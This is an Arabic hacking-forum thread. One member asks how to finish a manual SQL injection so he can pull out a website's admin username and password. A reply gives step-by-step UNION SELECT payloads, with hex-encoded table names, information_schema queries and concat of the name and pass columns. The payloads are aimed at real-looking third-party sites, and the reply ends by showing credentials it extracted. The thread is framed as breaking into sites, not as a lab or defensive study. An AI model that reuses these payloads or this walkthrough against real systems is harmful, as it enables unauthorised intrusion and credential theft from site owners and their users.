حل مشكله فى اختراق المواقع عن طريق السكيول

ارجوك اعطينى الحقنه افضل لقد مللت

اعطينى حل لمشكلتى للخطوه التى اقف بها ارجوك

رجاء لا احد يمر بموضوعى ويرد
خذ دوره او تعلم شىء ارجوكم اريد حل لمشكله فقط

كما تُريد ،،
ضع إلى أين أنت واصل و سأكملهـا لكـ ،،

انا اقف هنا يا اخى
ماذا افعل بعد ذلك لاستخرج يوزر وباسورد الادمن


http://tui.cn/sichuan/show.php?id=57...115,%2037%29--

اخى اعلم والله ان اللوحه من الممكن ان ادخل لها بدون تعريف ولكن انت لم تفيدنى حتى اللان فى حل مشكلتى انا اريد ان اكمل حقنتى يدويا وقد وقفت فى هذه الخطوه التى جعلتك تراها ماذا افعل بعد ذلك حتى استخرج يوزر الموقع والباسورد رجاء اضف لى الاوامر المستخدمه من بعد هذه الخطوه وكيفيه استخدامها حتى ولو شرح مبسط وانا ساحاول الفهم ماذا افعل بعد ذلك حتى استخرج اليوزر والباسورد حتى لو مش ده الموقع اللى عاوز اخترقه انا فى كل المواقع اللى بحاول اخترقها بقف فى الخطوه دى عاوز اعرف الطريقه الصحيحيه لاستكمال الحقنه حتى استخراج يوزر الادمن وباسورده
رجاء الرد وشكرا على متابعتك لموضوعى

تفضل يا أخي الكريم ، هذا الموضوع يشرح الخطوات التي تمر من خلالها أثناء عملية الحقن ، و يشرح لك باقي الخطوات التي توقفت أنت عندها

ترتيب الخطوات في حقن قواعد البيانات SQL Injection

جزاك الله كل خير يا اخى
شكرا لمتابعتك لحل مشكلتى جعله الله فى ميزان حسناتك ان شاء الله

الان يظهر لنا
file_users[IMG]file:///C:/Users/user/Downloads/hacked/heckers/%D9%85%D9%84%D9%81%D9%8A/%D8%B4%D8%B1%D8%AD%20%D8%AB%D8%BA%D8%B1%D8%A9%20sq l%20%D9%88%D8%AD%D9%82%D9%86%20%D9%85%D9%88%D9%82% D8%B9%20%D8%A7%D8%B5%D8%AF%D8%A7%D8%B1%20%D9%82%D8 %A7%D8%B9%D8%AF%D8%AA%D8%A9%20%D8%AE%D9%85%D8%B3%D 8%A9%20%D8%A8%D8%A3%D8%A8%D8%B3%D8%B7%20%D8%A7%D9% 84%D8%B7%D8%B1%D9%82%20%D9%85%D8%B9%20%D8%B4%D8%B1 %D8%AD%20%D8%A8%D9%84%D8%B5%D9%88%D8%B1%20-%20IQLIONS%20Forum%20%20%20%D9%85%D9%86%D8%AA%D8%A F%D9%8A%D8%A7%D8%AA%20%D8%A3%D8%B3%D9%88%D8%AF%20% D8%A7%D9%84%D8%B9%D8%B1%D8%A7%D9%82%20%20%D8%A7%D8 %AE%D8%AA%D8%B1%D8%A7%D9%82%20%20%20%D8%A3%D9%85%D 9%86%20%20%20%D8%AD%D9%85%D8%A7%D9%8A%D8%A9%20%20% 20%D8%A3%D9%86%D8%B8%D9%85%D8%A9%20%20%20%D8%AA%D8 %AF%D9%85%D9%8A%D8%B1%20%20%20%D8%A5%D9%85%D9%8A%D 9%84%D8%A7%D8%AA%20%20%20%D8%A3%D8%AC%D9%87%D8%B2% D8%A9%20%20%20%D8%B3%D9%8A%D8%B1%D9%81%D8%B1%D8%A7 %D8%AA_files/tongue.gif[/IMG]ass:darkdb
الان نعرف ماذا ظهر لنا
file_users:اسم الجدول
pass:هذا اسم عمود الباسورد لي انحنة طلعناه
darkdb:غير مهمة
الان طلعنة اسم الباسورد والان نظلع عمود اليوزر كيف اولا
نذهب لهذا الموقع
http://waraxe.us/sql-char-encoder.html
ونشفر كلمة
file_users
[IMG]file:///C:/Users/user/Downloads/hacked/heckers/%D9%85%D9%84%D9%81%D9%8A/%D8%B4%D8%B1%D8%AD%20%D8%AB%D8%BA%D8%B1%D8%A9%20sq l%20%D9%88%D8%AD%D9%82%D9%86%20%D9%85%D9%88%D9%82% D8%B9%20%D8%A7%D8%B5%D8%AF%D8%A7%D8%B1%20%D9%82%D8 %A7%D8%B9%D8%AF%D8%AA%D8%A9%20%D8%AE%D9%85%D8%B3%D 8%A9%20%D8%A8%D8%A3%D8%A8%D8%B3%D8%B7%20%D8%A7%D9% 84%D8%B7%D8%B1%D9%82%20%D9%85%D8%B9%20%D8%B4%D8%B1 %D8%AD%20%D8%A8%D9%84%D8%B5%D9%88%D8%B1%20-%20IQLIONS%20Forum%20%20%20%D9%85%D9%86%D8%AA%D8%A F%D9%8A%D8%A7%D8%AA%20%D8%A3%D8%B3%D9%88%D8%AF%20% D8%A7%D9%84%D8%B9%D8%B1%D8%A7%D9%82%20%20%D8%A7%D8 %AE%D8%AA%D8%B1%D8%A7%D9%82%20%20%20%D8%A3%D9%85%D 9%86%20%20%20%D8%AD%D9%85%D8%A7%D9%8A%D8%A9%20%20% 20%D8%A3%D9%86%D8%B8%D9%85%D8%A9%20%20%20%D8%AA%D8 %AF%D9%85%D9%8A%D8%B1%20%20%20%D8%A5%D9%85%D9%8A%D 9%84%D8%A7%D8%AA%20%20%20%D8%A3%D8%AC%D9%87%D8%B2% D8%A9%20%20%20%D8%B3%D9%8A%D8%B1%D9%81%D8%B1%D8%A7 %D8%AA_files/5kd65kqqvzvsi2htbyu7.png[/IMG]

[IMG]file:///C:/Users/user/Downloads/hacked/heckers/%D9%85%D9%84%D9%81%D9%8A/%D8%B4%D8%B1%D8%AD%20%D8%AB%D8%BA%D8%B1%D8%A9%20sq l%20%D9%88%D8%AD%D9%82%D9%86%20%D9%85%D9%88%D9%82% D8%B9%20%D8%A7%D8%B5%D8%AF%D8%A7%D8%B1%20%D9%82%D8 %A7%D8%B9%D8%AF%D8%AA%D8%A9%20%D8%AE%D9%85%D8%B3%D 8%A9%20%D8%A8%D8%A3%D8%A8%D8%B3%D8%B7%20%D8%A7%D9% 84%D8%B7%D8%B1%D9%82%20%D9%85%D8%B9%20%D8%B4%D8%B1 %D8%AD%20%D8%A8%D9%84%D8%B5%D9%88%D8%B1%20-%20IQLIONS%20Forum%20%20%20%D9%85%D9%86%D8%AA%D8%A F%D9%8A%D8%A7%D8%AA%20%D8%A3%D8%B3%D9%88%D8%AF%20% D8%A7%D9%84%D8%B9%D8%B1%D8%A7%D9%82%20%20%D8%A7%D8 %AE%D8%AA%D8%B1%D8%A7%D9%82%20%20%20%D8%A3%D9%85%D 9%86%20%20%20%D8%AD%D9%85%D8%A7%D9%8A%D8%A9%20%20% 20%D8%A3%D9%86%D8%B8%D9%85%D8%A9%20%20%20%D8%AA%D8 %AF%D9%85%D9%8A%D8%B1%20%20%20%D8%A5%D9%85%D9%8A%D 9%84%D8%A7%D8%AA%20%20%20%D8%A3%D8%AC%D9%87%D8%B2% D8%A9%20%20%20%D8%B3%D9%8A%D8%B1%D9%81%D8%B1%D8%A7 %D8%AA_files/0inwhy9lip907ip491tk.png[/IMG]
عندما نذهب الى الموقع نضع الكلمة المراد تشفيرها في الخانة الولى ونضغط
Encode now
الان نحضر التشفير من ثاني خانة على اليسار
0x66696c655f7573657273
هذا التشفير
الان نظع الامر تالي بدل الامر
where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)
نمسحة ونضع الاتي
where+table_name=xxxx
مع تغير xxx
الى التشقير فيصبح
where+table_name=0x66696c655f7573657273
وفائتة هذا الامر هو لاظهار عمود اليوزر
فيصبح الموقع

http://modules.t-o-m-e.net/module.ph...5f7573657273--
[IMG]file:///C:/Users/user/Downloads/hacked/heckers/%D9%85%D9%84%D9%81%D9%8A/%D8%B4%D8%B1%D8%AD%20%D8%AB%D8%BA%D8%B1%D8%A9%20sq l%20%D9%88%D8%AD%D9%82%D9%86%20%D9%85%D9%88%D9%82% D8%B9%20%D8%A7%D8%B5%D8%AF%D8%A7%D8%B1%20%D9%82%D8 %A7%D8%B9%D8%AF%D8%AA%D8%A9%20%D8%AE%D9%85%D8%B3%D 8%A9%20%D8%A8%D8%A3%D8%A8%D8%B3%D8%B7%20%D8%A7%D9% 84%D8%B7%D8%B1%D9%82%20%D9%85%D8%B9%20%D8%B4%D8%B1 %D8%AD%20%D8%A8%D9%84%D8%B5%D9%88%D8%B1%20-%20IQLIONS%20Forum%20%20%20%D9%85%D9%86%D8%AA%D8%A F%D9%8A%D8%A7%D8%AA%20%D8%A3%D8%B3%D9%88%D8%AF%20% D8%A7%D9%84%D8%B9%D8%B1%D8%A7%D9%82%20%20%D8%A7%D8 %AE%D8%AA%D8%B1%D8%A7%D9%82%20%20%20%D8%A3%D9%85%D 9%86%20%20%20%D8%AD%D9%85%D8%A7%D9%8A%D8%A9%20%20% 20%D8%A3%D9%86%D8%B8%D9%85%D8%A9%20%20%20%D8%AA%D8 %AF%D9%85%D9%8A%D8%B1%20%20%20%D8%A5%D9%85%D9%8A%D 9%84%D8%A7%D8%AA%20%20%20%D8%A3%D8%AC%D9%87%D8%B2% D8%A9%20%20%20%D8%B3%D9%8A%D8%B1%D9%81%D8%B1%D8%A7 %D8%AA_files/58p8t6drc5hq2kcx2n.png[/IMG]
file_users:name:darkdb
الان ظهر الانةfile_users:name:darkdb
name:هذا عمود اليوزر
الان سوف نظهر اليوزر والباسورد
الان نحذف هذا كلة
information_schema.columns+where+table_name=0x6669 6c655f7573657273
ونضع بدلة
file_users
يعني يقول لة احضر من هذا الجدول
ونحذف من الامر
Concat(table_name,0x3a,column_name,0x3a,table_sche ma)
نحف
table_name,0x3a,column_name
ونظع بدلة
اسم عمود اليوزر وهو
name
يعني يصبح احضر من الجدول هذا اليوزر
ونحذف
table_schema
ونظع بدلة اسم عمود الباسورد وهو
pass
يعني يقول لة احضر الباسورد من الجدول هذا
فلخلاصة هي تقول الحقنة ان تحضر من الجدول file_users اليوزر هو name والباسورد هو pass
فيصبح الموقع
http://modules.t-o-m-e.net/module.php?id=-52+Union+Select+1,2,3,Concat(name,0x3a,pass),5,6,7 ,8,9,10,11,12,13+from+file_users--
[IMG]file:///C:/Users/user/Downloads/hacked/heckers/%D9%85%D9%84%D9%81%D9%8A/%D8%B4%D8%B1%D8%AD%20%D8%AB%D8%BA%D8%B1%D8%A9%20sq l%20%D9%88%D8%AD%D9%82%D9%86%20%D9%85%D9%88%D9%82% D8%B9%20%D8%A7%D8%B5%D8%AF%D8%A7%D8%B1%20%D9%82%D8 %A7%D8%B9%D8%AF%D8%AA%D8%A9%20%D8%AE%D9%85%D8%B3%D 8%A9%20%D8%A8%D8%A3%D8%A8%D8%B3%D8%B7%20%D8%A7%D9% 84%D8%B7%D8%B1%D9%82%20%D9%85%D8%B9%20%D8%B4%D8%B1 %D8%AD%20%D8%A8%D9%84%D8%B5%D9%88%D8%B1%20-%20IQLIONS%20Forum%20%20%20%D9%85%D9%86%D8%AA%D8%A F%D9%8A%D8%A7%D8%AA%20%D8%A3%D8%B3%D9%88%D8%AF%20% D8%A7%D9%84%D8%B9%D8%B1%D8%A7%D9%82%20%20%D8%A7%D8 %AE%D8%AA%D8%B1%D8%A7%D9%82%20%20%20%D8%A3%D9%85%D 9%86%20%20%20%D8%AD%D9%85%D8%A7%D9%8A%D8%A9%20%20% 20%D8%A3%D9%86%D8%B8%D9%85%D8%A9%20%20%20%D8%AA%D8 %AF%D9%85%D9%8A%D8%B1%20%20%20%D8%A5%D9%85%D9%8A%D 9%84%D8%A7%D8%AA%20%20%20%D8%A3%D8%AC%D9%87%D8%B2% D8%A9%20%20%20%D8%B3%D9%8A%D8%B1%D9%81%D8%B1%D8%A7 %D8%AA_files/zggettd5u8om0cbeyq04.png[/IMG]
مبرووووووووووووووووك عليك
darkgod:filezzz

darkgod:اليوزر
filezzz:الباسورد